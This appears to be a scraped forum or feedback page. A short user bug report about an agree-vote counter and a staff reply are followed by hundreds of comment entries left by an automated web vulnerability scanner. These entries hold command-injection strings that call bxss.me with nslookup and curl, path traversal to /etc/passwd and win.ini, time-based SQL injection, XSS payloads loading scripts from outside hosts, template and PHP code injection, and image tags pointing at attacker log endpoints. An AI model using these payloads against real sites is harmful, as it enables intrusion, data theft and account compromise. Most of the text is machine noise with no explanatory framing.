It seems that the agree counter starts at 1 instead of 0, unless someone agreed under 0.1 second after posting. Also I am able to agree with my own post. (Clicking again removed my vote though. That's good, but maybe the thumb should signalise whether I agreed already or not/stopped agreeing? Perhaps it could be green when I agree)
462 agree
Unvote8064 agree
2858 agree
798 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
660 agree
645 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
578 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
489 agree
488 agree
482 agree
478 agree
476 agree
469 agree
467 agree
465 agree
462 agree
461 agree
455 agree
455 agree
441 agree
434 agree
432 agree
420 agree
Erik
It's because we assume that you liked it yourself :) We'll make it more apparent that it's We can however, fix so it's more apparent that you have agreedBeyPokéDig
I guessed correctly that you made it start at 1 because of that, but I was able to agree manually as well, so there were 2 agrees, both by me.lxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1CixKlpQ9eO1Dt0L5piEAO
1Anonymous
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${10000282+9999553}${10000380+10000439}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
response.write(9474179*9727977)WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
http://bxss.me/t/fit.txt?.jpgWfxYANoW
file:///etc/passwdWfxYANoW
/etc/shellsWfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
c:/windows/win.iniWfxYANoW
bxss.meWfxYANoW
1WfxYANoW
'+response.write(9474179*9727977)+'WfxYANoW
../1WfxYANoW
"+response.write(9474179*9727977)+"1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1response.write(9519080*9814343)
1Http://bxss.me/t/fit.txt
1'+response.write(9519080*9814343)+'
1file:///etc/passwd
1http://bxss.me/t/fit.txt?.jpg
1"+response.write(9519080*9814343)+"
1WfxYANoW
1../WfxYANoW
1WfxYANoW
echo hygnrv$()\ vsfmiz\nz^xyu||a #' &echo hygnrv$()\ vsfmiz\nz^xyu||a #|" &echo hygnrv$()\ vsfmiz\nz^xyu||a #WfxYANoW
&echo eokkjq$()\ bdadho\nz^xyu||a #' &echo eokkjq$()\ bdadho\nz^xyu||a #|" &echo eokkjq$()\ bdadho\nz^xyu||a #WfxYANoW
ZidA2UZn/etc/shells
1WfxYANoW
1&echo xdrhen$()\ giqgmf\nz^xyu||a #' &echo xdrhen$()\ giqgmf\nz^xyu||a #|" &echo xdrhen$()\ giqgmf\nz^xyu||a #WfxYANoW
dl6AbOUU: PCQTOOSqMeEZGnqx
1WfxYANoW
|echo inqxtv$()\ vhgkoz\nz^xyu||a #' |echo inqxtv$()\ vhgkoz\nz^xyu||a #|" |echo inqxtv$()\ vhgkoz\nz^xyu||a #uh5Ay6MG: NFXrApZ1
1WfxYANoW
1c:/windows/win.ini
1WfxYANoW
1&n912287=v918218bxss.me
1d291NlVZU1k=
1WfxYANoW
)WfxYANoW
1|echo avspoz$()\ mkzqfl\nz^xyu||a #' |echo avspoz$()\ mkzqfl\nz^xyu||a #|" |echo avspoz$()\ mkzqfl\nz^xyu||a #WfxYANoW&n990494=v989756
1WfxYANoW
(nslookup -q=cname hitylloacmuawbfae2.bxss.me||curl hitylloacmuawbfae2.bxss.me))WfxYANoW
!(()&&!|*|*|WfxYANoW
^(#$!@#$)(()))******WfxYANoW
$(nslookup -q=cname hitanqwzgosaqf91c4.bxss.me||curl hitanqwzgosaqf91c4.bxss.me))
1WfxYANoW
&nslookup -q=cname hitobiatafbkd6601a.bxss.me&'\"`0&nslookup -q=cname hitobiatafbkd6601a.bxss.me&`'WfxYANoW
&(nslookup -q=cname hitesbmimpztj79a3c.bxss.me||curl hitesbmimpztj79a3c.bxss.me)&'\"`0&(nslookup -q=cname hitesbmimpztj79a3c.bxss.me||curl hitesbmimpztj79a3c.bxss.me)&`'!(()&&!|*|*|
1WfxYANoW
1WfxYANoW
|(nslookup -q=cname hitwaniqncowc92779.bxss.me||curl hitwaniqncowc92779.bxss.me)^(#$!@#$)(()))******
1WfxYANoW
'.gethostbyname(lc('hitfh'.'ffteelzv08dfe.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(66).chr(120).chr(80).'WfxYANoW
'"()WfxYANoW
".gethostbyname(lc("hitmo"."rkdajigf0f4a7.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(75).chr(109).chr(84)."WfxYANoW
gethostbyname(lc('hitrv'.'xskcoggwab782.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(68).chr(97).chr(86)WfxYANoW
1'&&sleep(27*1000)*hususc&&'WfxYANoW
1"&&sleep(27*1000)*evtiij&&"WfxYANoW
`(nslookup -q=cname hitooowjncbzk2de80.bxss.me||curl hitooowjncbzk2de80.bxss.me)`WfxYANoW
;(nslookup -q=cname hitamqqcjhheob6d1e.bxss.me||curl hitamqqcjhheob6d1e.bxss.me)|(nslookup -q=cname hitamqqcjhheob6d1e.bxss.me||curl hitamqqcjhheob6d1e.bxss.me)&(nslookup -q=cname hitamqqcjhheob6d1e.bxss.me||curl hitamqqcjhheob6d1e.bxss.me)WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitzpnmqtsrvr3a814.bxss.me||curl${IFS}hitzpnmqtsrvr3a814.bxss.me)WfxYANoW
1'||sleep(27*1000)*tlqisv||'WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitzsakqvspgq030a9.bxss.me||curl${IFS}hitzsakqvspgq030a9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzsakqvspgq030a9.bxss.me||curl${IFS}hitzsakqvspgq030a9.bxss.me)&`'WfxYANoW
1"||sleep(27*1000)*rqwtju||"WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
';print(md5(31337));$a='WfxYANoW
1WfxYANoW
";print(md5(31337));$a="WfxYANoW
${@print(md5(31337))}'"()
1WfxYANoW
${@print(md5(31337))}\WfxYANoW'&&sleep(27*1000)*fxgncl&&'
1WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
'.print(md5(31337)).'WfxYANoW
xfs.bxss.meWfxYANoW"&&sleep(27*1000)*hkdmde&&"
1xfs.bxss.me
1';print(md5(31337));$a='
1WfxYANoW'||sleep(27*1000)*utihpz||'
1";print(md5(31337));$a="
1WfxYANoW
'"WfxYANoW"||sleep(27*1000)*zoagck||"
1${@print(md5(31337))}
1WfxYANoW
<!--WfxYANoW
1'"()&%<zzz><ScRiPt >fqvW(9806)</ScRiPt>'"
1${@print(md5(31337))}\
1<!--
1'.print(md5(31337)).'
1WfxYANoW
'"()&%<zzz><ScRiPt >fqvW(9931)</ScRiPt>WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
1WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(104).concat(84).concat(108).concat(72)+(require"socket" Socket.gethostbyname("hitos"+"jsprimsc1cab8.bxss.me.")[3].to_s)+"WfxYANoW
19166100HttP://bxss.me/t/xss.html?%00
1WfxYANoW
commentWfxYANoW
comment�bxss.me/t/xss.html?%00
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(112).concat(74).concat(116).concat(70)+(require'socket' Socket.gethostbyname('hitgg'+'iexjbcmnec1e9.bxss.me.')[3].to_s)+'WfxYANoW
'A'.concat(70-3).concat(22*4).concat(110).concat(69).concat(114).concat(79)+(require'socket' Socket.gethostbyname('hitam'+'xaoxcolqb54ce.bxss.me.')[3].to_s)WfxYANoW
comment/.WfxYANoW
bfg8264<s1﹥s2ʺs3ʹhjl8264comment
1comment�
1comment/.
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >fqvW(9024)</ScRiPt>WfxYANoW
1<WOU9TB>4REE7[!+!]</WOU9TB>WfxYANoW
1QTuTej5sWfxYANoW
1<script>fqvW(9655)</script>WfxYANoW
1<script>fqvW(9968)</script>9968WfxYANoW
1<ScR<ScRiPt>IpT>fqvW(9977)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >fqvW(9815)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9702></ScRiPt>WfxYANoW
1<�ScRiPt >fqvW(9801)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=fqvW(9325)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9558'>WfxYANoW
1<body onload=fqvW(9122)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=fqvW(9700)>WfxYANoW
1WfxYANoW
-1 OR 2+839-839-1=0+0+0+1 --WfxYANoW
-1 OR 2+55-55-1=0+0+0+1WfxYANoW
1<img src=xyz OnErRor=fqvW(9765)>WfxYANoW
-1' OR 2+654-654-1=0+0+0+1 --WfxYANoW
1<img/src=">" onerror=alert(9337)>WfxYANoW
-1' OR 2+488-488-1=0+0+0+1 or 'S5ALttCy'='WfxYANoW
-1" OR 2+865-865-1=0+0+0+1 --WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%66%71%76%57%289444%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\fqvW(9321)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>fqvW(9477)</sCripT>WfxYANoW
1<input autofocus onfocus=fqvW(9157)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(fqvW(9036))}WfxYANoW
1OBLlH <ScRiPt >fqvW(9361)</ScRiPt>WfxYANoW
1<WIZ6QO>YZUUK[!+!]</WIZ6QO>WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW
1<ifRAme sRc=9294.com></IfRamE>WfxYANoW
1<aM2cuCm x=9378>WfxYANoW
1<img sRc='http://attacker-9391/log.php?WfxYANoW
1<aU4DYlx<WfxYANoW'"()&%<zzz><ScRiPt >fqvW(9190)</ScRiPt>
1'"()&%<zzz><ScRiPt >fqvW(9304)</ScRiPt>
1WfxYANoW9655346
1bfg3341<s1﹥s2ʺs3ʹhjl3341
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Zdfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >fqvW(9829)</ScRiPt>
1WfxYANoW<WXEIQ7>Q9R1I[!+!]</WXEIQ7>
1WfxYANoW<script>fqvW(9271)</script>
1WfxYANoW<script>fqvW(9777)</script>9777
1WfxYANoW<ScRiPt >fqvW(9403)</ScRiPt>
1WfxYANoW<�ScRiPt >fqvW(9162)</ScRiPt>
1WfxYANoW<body onload=fqvW(9873)>
1WfxYANoW<img src=xyz OnErRor=fqvW(9699)>
1WfxYANoW<img/src=">" onerror=alert(9610)>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW\u003CScRiPt\fqvW(9297)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>fqvW(9805)</sCripT>
1WfxYANoW<input autofocus onfocus=fqvW(9408)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(fqvW(9629))}
1WfxYANoWwircq <ScRiPt >fqvW(9915)</ScRiPt>
1WfxYANoW<WCMJMB>XASIB[!+!]</WCMJMB>
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW<ifRAme sRc=9478.com></IfRamE>
1WfxYANoW<aEHjCaF x=9972>
1WfxYANoW<img sRc='http://attacker-9578/log.php?
1WfxYANoW<a5xmsZB<
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1XGYZWuSV'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 475=(SELECT 475 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 415=(SELECT 415 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 713=(SELECT 713 FROM PG_SLEEP(15))--WfxYANoW
1IRst2zYV' OR 893=(SELECT 893 FROM PG_SLEEP(15))--WfxYANoW
1dOCKB4Tb') OR 767=(SELECT 767 FROM PG_SLEEP(15))--WfxYANoW
1Vv0IQPhK')) OR 143=(SELECT 143 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@oFuJoWfxYANoW
1WfxYANoW
1WfxYANoWfocxRg04
1WfxYANoW
1-1 OR 2+853-853-1=0+0+0+1 --
1-1 OR 2+648-648-1=0+0+0+1
1-1' OR 2+316-316-1=0+0+0+1 --
1-1' OR 2+390-390-1=0+0+0+1 or '5eztUio6'='
1-1" OR 2+986-986-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWQYsGaLig'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@J2QxF
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comfubvnhrk
1wkvtgkhb
response.write(9006569*9815855)hymuwuav
1wkvtgkhb
'+response.write(9006569*9815855)+'hymuwuav
1wkvtgkhb
"+response.write(9006569*9815855)+"ihctvxde
set|set&sethymuwuav
C5PtyreQresponse.write(9685371*9308051)
1ihctvxde
$(nslookup 6p4UQ4pC)hymuwuav
-1 OR 2+451-451-1=0+0+0+1 --'+response.write(9685371*9308051)+'
1ihctvxde
&nslookup eJ4WKqgx&'\"`0&nslookup eJ4WKqgx&`'hymuwuav
-1 OR 2+953-953-1=0+0+0+1"+response.write(9685371*9308051)+"
1set|set&set
1dqqkvrhv
fxUnEdAbhymuwuav
-1' OR 2+58-58-1=0+0+0+1 --hqsjgocd
../../../../../../../../../../etc/passwd$(nslookup 7EEzuBmn)
1lsnplErK
1hymuwuav
-1' OR 2+995-995-1=0+0+0+1 or 'PanPslSN'='hqsjgocd
../../../../../../../../../../../../../../../proc/version&nslookup u0aHXKnY&'\"`0&nslookup u0aHXKnY&`'
1muwxffsb
1rvvadmiy
${9999084+9999751}hymuwuav
-1" OR 2+765-765-1=0+0+0+1 --hqsjgocd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgollshklx
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpga3Z5NFI4MzE=
1${9999382+10000223}
1hymuwuav
if(now()=sysdate(),sleep(7),0)/*'XOR(if(now()=sysdate(),sleep(7),0))OR'"XOR(if(now()=sysdate(),sleep(7),0))OR"*/hqsjgocd
../../../../../../../../../../etc/passwd�.jpgollshklx
1some_inexistent_file_with_long_name�.jpgkmdlkctj
1&n946669=v962671yddtbuya
)hymuwuav
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/hqsjgocd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgollshklx
Http://testasp.vulnweb.com/t/fit.txtyddtbuya
!(()&&!|*|*|hymuwuav
-1; waitfor delay '0:0:7' --hqsjgocd
/../..//../..//../..//../..//../..//etc/passwd�.jpgollshklx
http://testasp.vulnweb.com/t/fit.txt?.jpgmuwxffsb
1mmtvnoys&n981218=v918803
1yddtbuya
^(#$!@#$)(()))******hymuwuav
-1); waitfor delay '0:0:7' --hqsjgocd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdollshklx
testasp.vulnweb.comAnonymous
1)
1hymuwuav
1 waitfor delay '0:0:10' --hqsjgocd
/etc/passwd!(()&&!|*|*|
1hymuwuav
rpM98HO6'; waitfor delay '0:0:10' --hqsjgocd
%2fetc%2fpasswd1some_inexistent_file_with_long_name�.jpg
1qckgonov
'"()^(#$!@#$)(()))******
1hymuwuav
-1;select pg_sleep(10); --hqsjgocd
/.././.././.././.././.././.././.././../etc/./passwd%00Http://testasp.vulnweb.com/t/fit.txt
1ocqqjaph
;print(md5(acunetix_wvs_security_test));ichyokge
http://testasp.vulnweb.com/t/xss.html?%00.jpghymuwuav
-1);select pg_sleep(3); --hqsjgocd
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdhttp://testasp.vulnweb.com/t/fit.txt?.jpg
1ocqqjaph
';print(md5(acunetix_wvs_security_test));$a=''"()
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1hymuwuav
-1);select pg_sleep(0); --hqsjgocd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdcygflqkl
1testasp.vulnweb.com
1ocqqjaph
";print(md5(acunetix_wvs_security_test));$a="bvgxotpo
http://hitXz2xgH7jrf.bxss.me/hsioaiqk
1hymuwuav
-1));select pg_sleep(3); --cygflqkl
commentxfmhrfcl
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))ocqqjaph
${@print(md5(acunetix_wvs_security_test))}hsioaiqk
1'"http://hit9D5xT24kvb.bxss.me/
1hymuwuav
-1));select pg_sleep(7); --hqsjgocd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.cygflqkl
comment�ocqqjaph
${@print(md5(acunetix_wvs_security_test))}\hsioaiqk
\pxktqtna
/www.vulnweb.comhymuwuav
1Kfdd8yz';select pg_sleep(3); --hqsjgocd
file:///etc/passwdcygflqkl
comment/.jtndklbv
'";print(md5(acunetix_wvs_security_test));
1/www.vulnweb.com
1hymuwuav
Z7y3Lmni';select pg_sleep(7); --hqsjgocd
/\../\../\../\../\../\../\../etc/passwdcygflqkl
1jtndklbv
<!--';print(md5(acunetix_wvs_security_test));$a='
1hsioaiqk
@@qME9Fbyxbxqus
1'"()&%<acx><ScRiPt >Mnt6(9853)</ScRiPt>hymuwuav
6uufaCi4');select pg_sleep(3); --hqsjgocd
WEB-INF/web.xmlcomment
1'"
1";print(md5(acunetix_wvs_security_test));$a="
1hsioaiqk
JyI=hymuwuav
tlSDKUPO');select pg_sleep(10); --hqsjgocd
/WEB-INF/web.xmlcomment�
1<!--
1${@print(md5(acunetix_wvs_security_test))}
1hymuwuav
h3ftTdwW'));select pg_sleep(7); --byxbxqus
'"()&%<acx><ScRiPt >Mnt6(9183)</ScRiPt>hqsjgocd
WEB-INF\web.xmlcomment/.
1${@print(md5(acunetix_wvs_security_test))}\
1hymuwuav
1../../../../../../../../../../etc/passwd
1hsioaiqk
(select convert(int,CHAR(65)))hymuwuav
1byxbxqus
1_9399hsioaiqk
1XbMRkvJH
11'"
1-1 OR 2+260-260-1=0+0+0+1 --
1byxbxqus
acu5495<s1﹥s2ʺs3ʹuca5495\
1../../../../../../../../../../etc/passwd�.jpg
1-1 OR 2+613-613-1=0+0+0+1
1-1' OR 2+221-221-1=0+0+0+1 --
1@@6NVzL
1-1' OR 2+159-159-1=0+0+0+1 or 'oeh3hxTi'='
1JyI=
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1-1" OR 2+136-136-1=0+0+0+1 --
1byxbxqus
{{9999478*9999218}}/etc/passwd
1%2fetc%2fpasswd
1(select convert(int,CHAR(65)))
1byxbxqus
1<ScRiPt >Mnt6(9286)</ScRiPt>1 waitfor delay '0:0:6' --
19iHEzlLI'; waitfor delay '0:0:6' --
1byxbxqus
1<W20CZ7>XXFO4[!+!]</W20CZ7>dGNHosun';select pg_sleep(12); --
1sRIHKXQD');select pg_sleep(12); --
1byxbxqus
1<script>Mnt6(9396)</script>J3hiaGlU'));select pg_sleep(12); --
1file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1byxbxqus
1<ScR<ScRiPt>IpT>Mnt6(9505)</sCr<ScRiPt>IpT>WEB-INF/web.xml
1/WEB-INF/web.xml
1byxbxqus
1<ScRiPt >Mnt6(9731)</ScRiPt>WEB-INF\web.xml
1byxbxqus
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9872></ScRiPt>byxbxqus
1<�ScRiPt >Mnt6(9157)</ScRiPt>byxbxqus
1<video><source onerror="javascript:Mnt6(9807)">byxbxqus
1<isindex type=image src=1 onerror=Mnt6(9413)>byxbxqus
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9228'>byxbxqus
1<body onload=Mnt6(9293)>byxbxqus
1<img src=//testasp.vulnweb.com/t/dot.gif onload=Mnt6(9059)>byxbxqus
1<img src=xyz OnErRor=Mnt6(9670)>byxbxqus
1<img/src=">" onerror=alert(9126)>byxbxqus
%31%3C%53%63%52%69%50%74%20%3E%4D%6E%74%36%289313%29%3C%2F%73%43%72%69%70%54%3Ebyxbxqus
1\u003CScRiPt\Mnt6(9715)\u003C/sCripT\u003Ebyxbxqus
1<ScRiPt>Mnt6(9287)</sCripT>byxbxqus
1<input autofocus onfocus=Mnt6(9116)>byxbxqus
<a HrEF=http://www.vulnweb.com></a>byxbxqus
<a HrEF=jaVaScRiPT:>byxbxqus
[url=http://www.vulnweb.com][/url]byxbxqus
1<img<!-- --> src=x onerror=alert(9403);//><!-- -->byxbxqus
1}body{acu:Expre/**/SSion(Mnt6(9289))}byxbxqus
1<% contenteditable onresize=Mnt6(9376)>byxbxqus
1_tn04M <ScRiPt >Mnt6(9347)</ScRiPt>byxbxqus
1<WFF5CA>RNGK1[!+!]</WFF5CA>byxbxqus
1<ifRAme sRc=9347.com></IfRamE>byxbxqus
1<W5pcXk x=9238>byxbxqus
1<img sRc='http://attacker-9540/log.php?byxbxqus'"()&%<acx><ScRiPt >Mnt6(9963)</ScRiPt>
1'"()&%<acx><ScRiPt >Mnt6(9658)</ScRiPt>
1byxbxqus_9635
1acu3151<s1﹥s2ʺs3ʹuca3151
1{{9999086*10000157}}
1byxbxqus<ScRiPt >Mnt6(9976)</ScRiPt>
1byxbxqus<WC2XGC>XBVBH[!+!]</WC2XGC>
1byxbxqus<script>Mnt6(9527)</script>
1byxbxqus<ScRiPt >Mnt6(9965)</ScRiPt>
1byxbxqus<�ScRiPt >Mnt6(9211)</ScRiPt>
1byxbxqus<body onload=Mnt6(9595)>
1byxbxqus<img src=xyz OnErRor=Mnt6(9695)>
1byxbxqus<img/src=">" onerror=alert(9374)>
1byxbxqus\u003CScRiPt\Mnt6(9201)\u003C/sCripT\u003E
1byxbxqus<ScRiPt>Mnt6(9178)</sCripT>
1byxbxqus<input autofocus onfocus=Mnt6(9269)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1byxbxqus}body{acu:Expre/**/SSion(Mnt6(9548))}
1byxbxqus<% contenteditable onresize=Mnt6(9831)>
1byxbxqus_RVl8Y <ScRiPt >Mnt6(9226)</ScRiPt>
1byxbxqus<W47J01>CAZ4V[!+!]</W47J01>
1byxbxqus<ifRAme sRc=9382.com></IfRamE>
1byxbxqus<RVeCVH x=9056>
1byxbxqus<img sRc='http://attacker-9608/log.php?
1abc123
abc123Comment